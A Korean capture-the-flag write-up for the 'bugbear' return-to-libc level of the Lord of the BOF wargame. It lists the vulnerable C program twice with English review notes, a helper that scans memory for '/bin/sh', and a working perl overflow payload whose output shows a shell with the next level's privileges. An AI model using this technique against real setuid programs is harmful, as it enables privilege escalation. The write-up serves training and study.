기초적인 RTL(Return-to-Libc) 문제였다.
난이도로 따지면 이전 문제보다 더 쉬운 정도 ㅋㅋㅋ
system 함수를 사용했다.
문제는 다음과 같다.
[darkknight@localhost darkknight]$ cat bugbear.c
/*
The Lord of the BOF : The Fellowship of the BOF
- bugbear
- RTL1
*/
#include <stdio.h>
#include <stdlib.h>
/*
 * Challenge program: copies the first command-line argument into a fixed
 * 40-byte stack buffer and prints it back.
 *
 * Review notes (defects visible in this listing):
 *  - The return type is omitted (implicit int) and no value is returned.
 *  - strcpy() is called although only <stdio.h> and <stdlib.h> are included
 *    above, so it has no prototype in scope.
 *  - argv[1][47] is read without checking the argument's length; an argument
 *    shorter than 47 characters makes this read run past its terminator.
 *  - strcpy() has no length limit, so any argument of 40 or more characters
 *    writes past the end of buffer. This is the memory-safety bug.
 *  - The 0xbf check inspects a single byte and places no bound on the copy.
 *    A length check before copying, or a bounded copy such as
 *    snprintf(buffer, sizeof buffer, "%s", argv[1]), is what removes the
 *    overflow.
 */
main(int argc, char *argv[])
{
char buffer[40];
int i; // never used in this function
if(argc < 2){
printf("argv error\n");
exit(0);
}
// Rejects input whose byte at index 47 is 0xbf. Presumably that index is the
// top byte of the saved return address on the target's stack layout, so that
// stack addresses are refused -- TODO confirm against the compiled binary.
if(argv[1][47] == '\xbf')
{
printf("stack betrayed you!!\n");
exit(0);
}
// Unbounded copy into a 40-byte buffer: the length of argv[1] is never checked.
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
}
/*
The Lord of the BOF : The Fellowship of the BOF
- bugbear
- RTL1
*/
#include <stdio.h>
#include <stdlib.h>
/*
 * Second copy of the challenge program as it appears on the page: copies
 * argv[1] into a 40-byte stack buffer and prints it.
 *
 * Review notes: strcpy() is unbounded, so an argument of 40 or more
 * characters overflows buffer. The argv[1][47] test reads a fixed index
 * without a length check and does not limit the copy. The fix is to check
 * the length before copying or to use a bounded copy
 * (for example snprintf(buffer, sizeof buffer, "%s", argv[1])).
 */
main(int argc, char *argv[])
{
char buffer[40];
int i; // never used in this function
if(argc < 2){
printf("argv error\n");
exit(0);
}
// Single-byte filter on index 47; out-of-bounds read for shorter arguments.
if(argv[1][47] == '\xbf')
{
printf("stack betrayed you!!\n");
exit(0);
}
// Unbounded copy: nothing ties the length of argv[1] to sizeof buffer.
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
}
/bin/sh 문자열을 찾는 소스는 다음과 같다.
/*
 * Helper from the write-up: starting at a hard-coded address, advances one
 * byte at a time until the 8 bytes at that address equal "/bin/sh" including
 * its terminating NUL, then prints the address where the match was found.
 *
 * Review notes:
 *  - No headers are shown for memcmp()/printf().
 *  - The scan has no upper bound; if no match exists in readable memory, the
 *    loop keeps reading until the process faults.
 *  - printf() uses %x for a long argument, a format/argument mismatch
 *    (%lx matches the type).
 *  - The constant is only meaningful where the library is mapped at that
 *    exact address on every run; presumably the target has no address-space
 *    randomization -- TODO confirm.
 */
int main(int argc,char **argv)
{
long shell;
shell = 0x40058ae0; // set to the address of system()
// Length 8 = 7 characters of "/bin/sh" plus the NUL terminator.
while(memcmp((void *)shell,"/bin/sh",8))shell++;
printf("\"/bin/sh\" is at 0x%x\n",shell);
}
// Body of the "/bin/sh" search helper, repeated on the page without its
// signature line. Same review notes apply: unbounded scan, %x used for a long.
{
long shell;
shell = 0x40058ae0; // set to the address of system()
// Compares 8 bytes: the 7 characters of "/bin/sh" plus the NUL terminator.
while(memcmp((void *)shell,"/bin/sh",8))shell++;
printf("\"/bin/sh\" is at 0x%x\n",shell);
}
[darkknight@localhost darkknight]$ ./bugbear `perl -e 'print "\xe0\x8a\x05\x40
"x12,"aaaa","\xf9\xbf\x0f\x40"'`
?@?@?@?@?@?@?@?@?@?@?@?@aaaa廈@
bash$ id
uid=512(darkknight) gid=512(darkknight) euid=513(bugbear) egid=513(bugbear) grou
ps=512(darkknight)
bash$ my-pass
euid = 513
new divide
"x12,"aaaa","\xf9\xbf\x0f\x40"'`
?@?@?@?@?@?@?@?@?@?@?@?@aaaa廈@
bash$ id
uid=512(darkknight) gid=512(darkknight) euid=513(bugbear) egid=513(bugbear) grou
ps=512(darkknight)
bash$ my-pass
euid = 513
new divide
OS가 Redhat 6.2라서 system 함수 안에 getuid() 함수가 없으므로, 즉 system()이 실행하는 셸이 setuid로 얻은 euid를 내려놓지 않으므로 사용할 수 있었다. 위 id 출력에서 euid=513(bugbear)이 그대로 유지된 것으로 확인된다.